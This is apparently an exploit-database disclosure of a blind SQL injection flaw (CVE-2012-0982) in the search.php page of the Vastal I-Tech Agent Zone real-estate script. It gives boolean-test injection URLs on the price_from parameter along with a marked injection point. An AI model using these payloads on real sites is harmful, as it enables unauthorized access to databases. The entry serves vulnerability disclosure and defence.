Vastal I-Tech Agent Zone - 'search.php' Blind SQL Injection

Author: Cagri Tepebasili
type: webapps
platform: php
port: 
date_added: 2012-01-31  
date_updated: 2012-01-31  
verified: 1  
codes: OSVDB-78958;CVE-2012-0982  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 18441.txt  
Agent Zone Vastal I-Tech Blind SQL Injection Vulnerability


# Date: 31.01.2012

# Author: Cagri Tepebasili

# Software : http://www.vastal.com/agent-zone-real-estate-script.html

# Tested on: Linux Mint 12

#####################################################################################################################

The First Step >>>
http://server/real/search.php?price_from=1000000.00+and+1=1&price_to=10000000.00

The Second Step >>>
http://server/real/search.php?price_from=1000000.00+and+1=0&price_to=10000000.00

Injection >>>
http://server/real/search.php?price_from=1000000.00[BlindSQLI]&price_to=10000000.00

Greetz : MythSEC <<<